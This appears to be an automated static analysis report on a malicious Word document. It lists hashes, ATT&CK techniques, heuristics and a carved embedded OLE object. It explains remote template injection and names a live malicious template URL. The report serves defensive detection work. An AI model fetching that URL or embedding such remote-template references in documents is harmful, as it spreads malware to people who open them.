Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 e4cc77d1bb798367…

MALICIOUS

Office (OOXML) / .DOC

121.7 KB Created: 2023-09-02 09:41:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2023-09-13
MD5: b4dbd4f66804dc194f2626c4e5811708 SHA-1: 448f02dc8007563984690acd31fc408698b9245c SHA-256: e4cc77d1bb798367aeae40d6cc54f69b6326b7faf249323f49b993aa3f32c00b
82 Risk Score

Malware Insights

MITRE ATT&CK
T1204 Malicious Link T1059 Command and Scripting Interpreter

The sample utilizes OOXML remote template injection and an embedded OLE object to redirect the user to an external URL. This external URL is likely used to download and execute a secondary stage payload, a common technique for initial access and further infection.

Heuristics 4

  • Remote template injection high OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (https://mub.me/CE4D) — a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word can fetch and apply the remote template; macros in that template may execute depending on Office policy and trust state.
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: https://mub.me/CE4D
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://mub.me/CE4D

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
ooxml_oleobject_00.bin
c600fab7b32c6c108dad586fce3e15cf04274d8c14c45cbf3783a290a447d6b0		 ooxml-ole-object OOXML embedded OLE part: word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx 25979 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.